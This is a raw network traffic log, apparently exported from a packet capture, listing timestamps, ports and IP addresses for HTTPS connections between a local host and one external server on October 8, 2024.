                                                                                                                                                  Oct 8, 2024 15:23:30.251910925 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.251919985 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.252397060 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.252522945 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.252542019 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.252669096 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.252676964 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.253319979 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.269220114 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.269243956 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.269484043 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.269484043 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.269499063 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.269566059 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.270673990 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.270690918 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.270787954 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.270787954 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.270797014 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.271050930 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.337145090 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.337172031 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.337248087 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.337265968 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.337497950 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.337697029 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.337714911 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.337837934 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.337837934 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.337843895 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.338010073 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.338504076 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.338522911 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.338607073 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.338607073 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.338612080 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.338654995 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.339029074 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.339055061 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.339123964 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.339129925 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.339402914 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.339864016 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.339880943 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.339951038 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.339956999 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.340049982 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.340703011 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.340720892 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.340822935 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.340828896 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.342003107 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.357429028 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.357446909 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.357512951 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.357522011 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.357690096 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.358253002 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.358270884 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.358364105 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.358369112 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.358431101 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.426997900 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.427018881 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.427124977 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.427136898 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.427189112 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.427627087 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.427644014 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.427788973 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.427793980 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.427858114 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.428247929 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.428266048 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.428333044 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.428337097 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.428395987 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.429317951 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.429338932 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.429413080 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.429418087 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.429429054 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.429500103 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.429671049 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.429688931 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.429908991 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.429913998 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.429980040 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.430314064 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.430329084 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.430399895 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.430406094 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.430464029 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.445132017 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.445153952 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.445787907 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.445864916 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.445866108 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.445866108 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.445883989 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.446006060 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.522814035 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.522850037 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.523015976 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.523030043 CEST4434970577.83.199.112192.168.2.16
Timestamp                            Source Port  Dest Port  Source IP      Dest IP
Oct 8, 2024 15:23:30.523142099 CEST  49705        443        192.168.2.16   77.83.199.112
Oct 8, 2024 15:23:30.523298979 CEST  443          49705      77.83.199.112  192.168.2.16
Oct 8, 2024 15:23:30.523322105 CEST  443          49705      77.83.199.112  192.168.2.16
Oct 8, 2024 15:23:30.523410082 CEST  49705        443        192.168.2.16   77.83.199.112
Oct 8, 2024 15:23:30.523413897 CEST  443          49705      77.83.199.112  192.168.2.16
Oct 8, 2024 15:23:30.523539066 CEST  49705        443        192.168.2.16   77.83.199.112
Oct 8, 2024 15:23:30.524004936 CEST  443          49705      77.83.199.112  192.168.2.16
Oct 8, 2024 15:23:30.524028063 CEST  443          49705      77.83.199.112  192.168.2.16
Oct 8, 2024 15:23:30.524209023 CEST  49705        443        192.168.2.16   77.83.199.112
Oct 8, 2024 15:23:30.524214983 CEST  443          49705      77.83.199.112  192.168.2.16
Oct 8, 2024 15:23:30.524327993 CEST  49705        443        192.168.2.16   77.83.199.112
Oct 8, 2024 15:23:30.524844885 CEST  443          49705      77.83.199.112  192.168.2.16
Oct 8, 2024 15:23:30.524867058 CEST  443          49705      77.83.199.112  192.168.2.16
Oct 8, 2024 15:23:30.525721073 CEST  49705        443        192.168.2.16   77.83.199.112
Oct 8, 2024 15:23:30.525727034 CEST  443          49705      77.83.199.112  192.168.2.16
Oct 8, 2024 15:23:30.525742054 CEST  443          49705      77.83.199.112  192.168.2.16
Oct 8, 2024 15:23:30.525866985 CEST  49705        443        192.168.2.16   77.83.199.112
Oct 8, 2024 15:23:30.525872946 CEST  443          49705      77.83.199.112  192.168.2.16
Oct 8, 2024 15:23:30.526014090 CEST  49705        443        192.168.2.16   77.83.199.112
Oct 8, 2024 15:23:30.526722908 CEST  443          49705      77.83.199.112  192.168.2.16
Oct 8, 2024 15:23:30.526741982 CEST  443          49705      77.83.199.112  192.168.2.16
Oct 8, 2024 15:23:30.527149916 CEST  49705        443        192.168.2.16   77.83.199.112
Oct 8, 2024 15:23:30.527149916 CEST  49705        443        192.168.2.16   77.83.199.112
Oct 8, 2024 15:23:30.527157068 CEST  443          49705      77.83.199.112  192.168.2.16
Oct 8, 2024 15:23:30.527225971 CEST  49705        443        192.168.2.16   77.83.199.112
Oct 8, 2024 15:23:30.533572912 CEST  443          49705      77.83.199.112  192.168.2.16
Oct 8, 2024 15:23:30.533598900 CEST  443          49705      77.83.199.112  192.168.2.16
Oct 8, 2024 15:23:30.533869982 CEST  49705        443        192.168.2.16   77.83.199.112
Oct 8, 2024 15:23:30.533878088 CEST  443          49705      77.83.199.112  192.168.2.16
Oct 8, 2024 15:23:30.533970118 CEST  49705        443        192.168.2.16   77.83.199.112
Oct 8, 2024 15:23:30.534624100 CEST  443          49705      77.83.199.112  192.168.2.16
Oct 8, 2024 15:23:30.534646988 CEST  443          49705      77.83.199.112  192.168.2.16
Oct 8, 2024 15:23:30.534718990 CEST  49705        443        192.168.2.16   77.83.199.112
Oct 8, 2024 15:23:30.534723043 CEST  443          49705      77.83.199.112  192.168.2.16
Oct 8, 2024 15:23:30.534774065 CEST  49705        443        192.168.2.16   77.83.199.112
Oct 8, 2024 15:23:30.610589981 CEST  443          49705      77.83.199.112  192.168.2.16
Oct 8, 2024 15:23:30.610610008 CEST  443          49705      77.83.199.112  192.168.2.16
Oct 8, 2024 15:23:30.610714912 CEST  49705        443        192.168.2.16   77.83.199.112
Oct 8, 2024 15:23:30.610737085 CEST  443          49705      77.83.199.112  192.168.2.16
Oct 8, 2024 15:23:30.610784054 CEST  49705        443        192.168.2.16   77.83.199.112
Oct 8, 2024 15:23:30.610784054 CEST  49705        443        192.168.2.16   77.83.199.112
Oct 8, 2024 15:23:30.611273050 CEST  443          49705      77.83.199.112  192.168.2.16
Oct 8, 2024 15:23:30.611289024 CEST  443          49705      77.83.199.112  192.168.2.16
Oct 8, 2024 15:23:30.611377001 CEST  49705        443        192.168.2.16   77.83.199.112
Oct 8, 2024 15:23:30.611399889 CEST  443          49705      77.83.199.112  192.168.2.16
Oct 8, 2024 15:23:30.611454010 CEST  49705        443        192.168.2.16   77.83.199.112
Oct 8, 2024 15:23:30.611855984 CEST  443          49705      77.83.199.112  192.168.2.16
Oct 8, 2024 15:23:30.611879110 CEST  443          49705      77.83.199.112  192.168.2.16
Oct 8, 2024 15:23:30.611939907 CEST  49705        443        192.168.2.16   77.83.199.112
Oct 8, 2024 15:23:30.611948013 CEST  443          49705      77.83.199.112  192.168.2.16
Oct 8, 2024 15:23:30.611998081 CEST  49705        443        192.168.2.16   77.83.199.112
Oct 8, 2024 15:23:30.612823009 CEST  443          49705      77.83.199.112  192.168.2.16
Oct 8, 2024 15:23:30.612844944 CEST  443          49705      77.83.199.112  192.168.2.16
Oct 8, 2024 15:23:30.612895012 CEST  443          49705      77.83.199.112  192.168.2.16
Oct 8, 2024 15:23:30.612929106 CEST  49705        443        192.168.2.16   77.83.199.112
Oct 8, 2024 15:23:30.612943888 CEST  443          49705      77.83.199.112  192.168.2.16
Oct 8, 2024 15:23:30.612967968 CEST  443          49705      77.83.199.112  192.168.2.16
Oct 8, 2024 15:23:30.612997055 CEST  49705        443        192.168.2.16   77.83.199.112
Oct 8, 2024 15:23:30.612997055 CEST  49705        443        192.168.2.16   77.83.199.112
Oct 8, 2024 15:23:30.613074064 CEST  49705        443        192.168.2.16   77.83.199.112
Oct 8, 2024 15:23:30.613738060 CEST  443          49705      77.83.199.112  192.168.2.16
Oct 8, 2024 15:23:30.613753080 CEST  443          49705      77.83.199.112  192.168.2.16
Oct 8, 2024 15:23:30.613877058 CEST  49705        443        192.168.2.16   77.83.199.112
Oct 8, 2024 15:23:30.613878012 CEST  49705        443        192.168.2.16   77.83.199.112
Oct 8, 2024 15:23:30.613888025 CEST  443          49705      77.83.199.112  192.168.2.16
Oct 8, 2024 15:23:30.613962889 CEST  49705        443        192.168.2.16   77.83.199.112
Oct 8, 2024 15:23:30.621437073 CEST  443          49705      77.83.199.112  192.168.2.16
Oct 8, 2024 15:23:30.621452093 CEST  443          49705      77.83.199.112  192.168.2.16
Oct 8, 2024 15:23:30.621586084 CEST  49705        443        192.168.2.16   77.83.199.112
Oct 8, 2024 15:23:30.621606112 CEST  443          49705      77.83.199.112  192.168.2.16
Oct 8, 2024 15:23:30.621656895 CEST  49705        443        192.168.2.16   77.83.199.112
Oct 8, 2024 15:23:30.622412920 CEST  443          49705      77.83.199.112  192.168.2.16
Oct 8, 2024 15:23:30.622428894 CEST  443          49705      77.83.199.112  192.168.2.16
Oct 8, 2024 15:23:30.622587919 CEST  49705        443        192.168.2.16   77.83.199.112
Oct 8, 2024 15:23:30.622601032 CEST  443          49705      77.83.199.112  192.168.2.16
Oct 8, 2024 15:23:30.622759104 CEST  49705        443        192.168.2.16   77.83.199.112
Oct 8, 2024 15:23:30.702886105 CEST  443          49705      77.83.199.112  192.168.2.16
Oct 8, 2024 15:23:30.702907085 CEST  443          49705      77.83.199.112  192.168.2.16
Oct 8, 2024 15:23:30.703035116 CEST  49705        443        192.168.2.16   77.83.199.112
Oct 8, 2024 15:23:30.703058958 CEST  443          49705      77.83.199.112  192.168.2.16
Oct 8, 2024 15:23:30.703104973 CEST  49705        443        192.168.2.16   77.83.199.112
Oct 8, 2024 15:23:30.703104973 CEST  49705        443        192.168.2.16   77.83.199.112
Oct 8, 2024 15:23:30.703223944 CEST  443          49705      77.83.199.112  192.168.2.16
Oct 8, 2024 15:23:30.703239918 CEST  443          49705      77.83.199.112  192.168.2.16
Oct 8, 2024 15:23:30.703353882 CEST  49705        443        192.168.2.16   77.83.199.112
Oct 8, 2024 15:23:30.703353882 CEST  49705        443        192.168.2.16   77.83.199.112
Oct 8, 2024 15:23:30.703361034 CEST  443          49705      77.83.199.112  192.168.2.16
Oct 8, 2024 15:23:30.703413010 CEST  49705        443        192.168.2.16   77.83.199.112
Oct 8, 2024 15:23:30.704194069 CEST  443          49705      77.83.199.112  192.168.2.16
Oct 8, 2024 15:23:30.704209089 CEST  443          49705      77.83.199.112  192.168.2.16
Oct 8, 2024 15:23:30.704308033 CEST  49705        443        192.168.2.16   77.83.199.112
Oct 8, 2024 15:23:30.704313993 CEST  443          49705      77.83.199.112  192.168.2.16
Oct 8, 2024 15:23:30.704369068 CEST  49705        443        192.168.2.16   77.83.199.112
Oct 8, 2024 15:23:30.704369068 CEST  49705        443        192.168.2.16   77.83.199.112
Oct 8, 2024 15:23:30.704718113 CEST  443          49705      77.83.199.112  192.168.2.16
Oct 8, 2024 15:23:30.704735994 CEST  443          49705      77.83.199.112  192.168.2.16
Oct 8, 2024 15:23:30.704983950 CEST  49705        443        192.168.2.16   77.83.199.112
Oct 8, 2024 15:23:30.704983950 CEST  49705        443        192.168.2.16   77.83.199.112
Oct 8, 2024 15:23:30.704993010 CEST  443          49705      77.83.199.112  192.168.2.16
Oct 8, 2024 15:23:30.705279112 CEST  49705        443        192.168.2.16   77.83.199.112
Oct 8, 2024 15:23:30.705396891 CEST  443          49705      77.83.199.112  192.168.2.16
Oct 8, 2024 15:23:30.705411911 CEST  443          49705      77.83.199.112  192.168.2.16
Oct 8, 2024 15:23:30.705498934 CEST  49705        443        192.168.2.16   77.83.199.112
Oct 8, 2024 15:23:30.705503941 CEST  443          49705      77.83.199.112  192.168.2.16
Oct 8, 2024 15:23:30.705897093 CEST  49705        443        192.168.2.16   77.83.199.112
Oct 8, 2024 15:23:30.706298113 CEST  443          49705      77.83.199.112  192.168.2.16
Oct 8, 2024 15:23:30.706314087 CEST  443          49705      77.83.199.112  192.168.2.16
Oct 8, 2024 15:23:30.706456900 CEST  49705        443        192.168.2.16   77.83.199.112
Oct 8, 2024 15:23:30.706460953 CEST  443          49705      77.83.199.112  192.168.2.16
Oct 8, 2024 15:23:30.706536055 CEST  49705        443        192.168.2.16   77.83.199.112
Oct 8, 2024 15:23:30.712985992 CEST  443          49705      77.83.199.112  192.168.2.16
Oct 8, 2024 15:23:30.713006973 CEST  443          49705      77.83.199.112  192.168.2.16
Oct 8, 2024 15:23:30.713167906 CEST  49705        443        192.168.2.16   77.83.199.112
Oct 8, 2024 15:23:30.713174105 CEST  443          49705      77.83.199.112  192.168.2.16
Oct 8, 2024 15:23:30.713568926 CEST  443          49705      77.83.199.112  192.168.2.16
Oct 8, 2024 15:23:30.713587046 CEST  443          49705      77.83.199.112  192.168.2.16
Oct 8, 2024 15:23:30.713608027 CEST  49705        443        192.168.2.16   77.83.199.112
Oct 8, 2024 15:23:30.713613033 CEST  443          49705      77.83.199.112  192.168.2.16
Oct 8, 2024 15:23:30.713629961 CEST  49705        443        192.168.2.16   77.83.199.112
Oct 8, 2024 15:23:30.713705063 CEST  49705        443        192.168.2.16   77.83.199.112
Oct 8, 2024 15:23:30.791315079 CEST  443          49705      77.83.199.112  192.168.2.16
Oct 8, 2024 15:23:30.791338921 CEST  443          49705      77.83.199.112  192.168.2.16
Oct 8, 2024 15:23:30.791418076 CEST  49705        443        192.168.2.16   77.83.199.112
Oct 8, 2024 15:23:30.791430950 CEST  443          49705      77.83.199.112  192.168.2.16
Oct 8, 2024 15:23:30.791497946 CEST  49705        443        192.168.2.16   77.83.199.112
Oct 8, 2024 15:23:30.791497946 CEST  49705        443        192.168.2.16   77.83.199.112
Oct 8, 2024 15:23:30.791996956 CEST  443          49705      77.83.199.112  192.168.2.16
Oct 8, 2024 15:23:30.792013884 CEST  443          49705      77.83.199.112  192.168.2.16
Oct 8, 2024 15:23:30.792228937 CEST  49705        443        192.168.2.16   77.83.199.112
Oct 8, 2024 15:23:30.792238951 CEST  443          49705      77.83.199.112  192.168.2.16
Oct 8, 2024 15:23:30.792300940 CEST  443          49705      77.83.199.112  192.168.2.16
Oct 8, 2024 15:23:30.792316914 CEST  49705        443        192.168.2.16   77.83.199.112
Oct 8, 2024 15:23:30.792324066 CEST  443          49705      77.83.199.112  192.168.2.16
Oct 8, 2024 15:23:30.792535067 CEST  49705        443        192.168.2.16   77.83.199.112
Oct 8, 2024 15:23:30.792535067 CEST  49705        443        192.168.2.16   77.83.199.112
Oct 8, 2024 15:23:30.792923927 CEST  443          49705      77.83.199.112  192.168.2.16
Oct 8, 2024 15:23:30.792941093 CEST  443          49705      77.83.199.112  192.168.2.16
Oct 8, 2024 15:23:30.793287992 CEST  49705        443        192.168.2.16   77.83.199.112
Oct 8, 2024 15:23:30.793298006 CEST  443          49705      77.83.199.112  192.168.2.16
Oct 8, 2024 15:23:30.793350935 CEST  49705        443        192.168.2.16   77.83.199.112
Oct 8, 2024 15:23:30.793525934 CEST  443          49705      77.83.199.112  192.168.2.16
Oct 8, 2024 15:23:30.793540955 CEST  443          49705      77.83.199.112  192.168.2.16
Oct 8, 2024 15:23:30.793612003 CEST  49705        443        192.168.2.16   77.83.199.112
Oct 8, 2024 15:23:30.793618917 CEST  443          49705      77.83.199.112  192.168.2.16
Oct 8, 2024 15:23:30.793670893 CEST  49705        443        192.168.2.16   77.83.199.112
Oct 8, 2024 15:23:30.794177055 CEST  443          49705      77.83.199.112  192.168.2.16
Oct 8, 2024 15:23:30.794195890 CEST  443          49705      77.83.199.112  192.168.2.16
Oct 8, 2024 15:23:30.794332027 CEST  49705        443        192.168.2.16   77.83.199.112
Oct 8, 2024 15:23:30.794338942 CEST  443          49705      77.83.199.112  192.168.2.16
Oct 8, 2024 15:23:30.794461012 CEST  49705        443        192.168.2.16   77.83.199.112
Oct 8, 2024 15:23:30.797379971 CEST  443          49705      77.83.199.112  192.168.2.16
Oct 8, 2024 15:23:30.797399044 CEST  443          49705      77.83.199.112  192.168.2.16
Oct 8, 2024 15:23:30.797497988 CEST  49705        443        192.168.2.16   77.83.199.112
Oct 8, 2024 15:23:30.797498941 CEST  49705        443        192.168.2.16   77.83.199.112
Oct 8, 2024 15:23:30.797513008 CEST  443          49705      77.83.199.112  192.168.2.16
Oct 8, 2024 15:23:30.797668934 CEST  49705        443        192.168.2.16   77.83.199.112
Oct 8, 2024 15:23:30.800874949 CEST  443          49705      77.83.199.112  192.168.2.16
Oct 8, 2024 15:23:30.800890923 CEST  443          49705      77.83.199.112  192.168.2.16
Oct 8, 2024 15:23:30.800968885 CEST  49705        443        192.168.2.16   77.83.199.112
Oct 8, 2024 15:23:30.800976038 CEST  443          49705      77.83.199.112  192.168.2.16
Oct 8, 2024 15:23:30.801096916 CEST  49705        443        192.168.2.16   77.83.199.112
Oct 8, 2024 15:23:30.839711905 CEST  443          49705      77.83.199.112  192.168.2.16
Oct 8, 2024 15:23:30.839797020 CEST  443          49705      77.83.199.112  192.168.2.16
Oct 8, 2024 15:23:30.839844942 CEST  49705        443        192.168.2.16   77.83.199.112
Oct 8, 2024 15:23:30.839983940 CEST  49705        443        192.168.2.16   77.83.199.112
Oct 8, 2024 15:23:30.839983940 CEST  49705        443        192.168.2.16   77.83.199.112
Oct 8, 2024 15:23:30.840095043 CEST  49705        443        192.168.2.16   77.83.199.112
Oct 8, 2024 15:23:43.421005964 CEST  49707        443        192.168.2.16   77.83.199.112
Oct 8, 2024 15:23:43.421071053 CEST  443          49707      77.83.199.112  192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:43.421175003 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:43.430324078 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:43.430360079 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:43.969883919 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:43.969988108 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:43.971782923 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:43.971796036 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:43.972058058 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:43.981434107 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:44.023405075 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.130671024 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.130691051 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.130779028 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:44.130795002 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.175134897 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:44.221921921 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.221939087 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.222043037 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.222054958 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:44.222076893 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.222081900 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.222129107 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:44.224201918 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.224231005 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.224291086 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:44.224298954 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.224354982 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:44.312536001 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.312572956 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.312674999 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:44.312696934 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.312757015 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:44.314178944 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.314202070 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.314258099 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:44.314265966 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.314434052 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:44.316086054 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.316104889 CEST4434970777.83.199.112192.168.2.16
